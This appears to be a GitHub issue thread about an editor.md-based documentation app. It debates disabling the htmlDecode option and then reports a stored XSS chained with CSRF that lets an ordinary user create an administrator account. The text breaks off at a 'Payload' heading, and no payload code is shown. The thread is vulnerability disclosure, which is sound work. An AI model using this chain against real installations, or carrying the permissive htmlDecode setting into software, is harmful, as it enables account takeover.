Open 0x2E opened 5 years ago
The editor.md option in /views/page/edit.html
htmlDecode : "style,script,iframe|on*",
should be changed to
htmlDecode : false,
Other views also seem to have the htmlDecode option set to allow it. I didn't look closely, but it seems they can all be disabled, and in theory it really isn't needed.
@GrandMarch Yes, changing it to htmlDecode : false, so that HTML tags are not parsed, does block this. But for the sake of extensibility, being able to write HTML tags directly is more flexible. So I haven't decided yet whether to remove it.
Hello, I found two vulnerabilities: a stored XSS and a CSRF. An attacker can exploit the vulnerability to execute malicious JavaScript on a document page and hijack the identity of other users (normal users or administrators).
XSS
The document editor does not filter or block the execution of JavaScript, resulting in stored XSS. Any user browsing a document containing the malicious XSS code will trigger the vulnerability.
CSRF
Using the XSS vulnerability from the previous step, an attacker can hijack the identity of other users. I recorded a GIF to demonstrate a normal user hijacking the super administrator's identity to create a new administrator account.
Payload